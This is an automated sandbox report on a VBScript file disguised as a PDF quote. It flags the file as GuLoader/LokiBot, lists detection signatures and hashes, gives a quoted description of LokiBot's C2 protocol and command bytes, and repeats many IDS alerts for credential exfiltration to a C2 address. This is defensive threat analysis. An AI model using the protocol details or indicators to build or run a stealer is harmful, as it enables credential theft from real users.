Windows Analysis Report
Request for Proposal Quote_2414976#U00b7pdf.vbs

Overview

General Information

Sample name: Request for Proposal Quote_2414976#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name: Request for Proposal Quote_2414976pdf.vbs
Analysis ID: 1428348
MD5: 4c0d5b830080aa8b72546a6d7f924aca
SHA1: d061aa6f577e894eb58fd4bc64b366e2e7919630
SHA256: 56b71885512e781975e310bc62af1a41bd731895d661f5cc49eff2a640806cd0
Tags: vbs
Infos:

Detection

GuLoader, Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
Loki Password Stealer (PWS), LokiBot "Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
 https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Multi AV Scanner detection for submitted file
Source: Request for Proposal Quote_2414976#U00b7pdf.vbs ReversingLabs: Detection: 13%
Source: unknown HTTPS traffic detected: 173.194.219.138:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 173.194.219.138:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2536676585.0000000007ACA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2536676585.0000000007A69000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2536676585.0000000007A69000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb? source: powershell.exe, 00000005.00000002.2539882083.00000000089E0000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49717 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49717 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49717 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49717 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49718 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49718 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49718 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49718 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49719 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49719 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49719 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49719 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49720 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49720 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49720 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49720 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49722 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49722 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49722 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49722 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49723 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49723 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49723 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49723 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49724 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49724 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49724 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49724 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49725 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49725 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49725 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49725 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49726 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49726 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49726 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49726 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49727 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49727 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49727 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49727 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49728 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49728 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49728 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49728 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49729 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49729 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49729 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49729 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49730 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49730 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49730 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49730 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49731 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49731 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49731 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49731 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49732 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49732 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49732 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49732 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49733 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49733 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49733 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49733 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49734 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49734 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49734 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49734 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49735 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49735 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49735 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49735 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49736 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49736 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49736 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49736 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49737 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49737 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49737 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49737 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49738 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49738 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49738 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49738 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49739 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49739 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49739 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49739 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49742 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49742 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49742 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49742 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49743 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49743 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49743 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49743 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49744 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49744 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49744 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49744 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49745 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49745 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49745 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49745 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49746 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49746 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49746 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49746 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49747 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49747 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49747 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49747 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49748 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49748 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49748 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49748 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49749 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49749 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49750 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49750 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49750 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49750 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49751 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49751 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49751 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49751 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49752 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49752 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49752 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49752 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49753 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49753 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49753 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49753 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49754 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49754 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49754 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49754 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49755 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49755 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49755 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49755 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49756 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49756 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49756 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49756 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49757 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49757 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49757 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49757 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49758 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49758 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49758 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49758 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49759 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49759 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49759 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49759 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49760 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49760 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49760 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49760 -> 24.199.107.111:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49761 -> 24.199.107.111:80
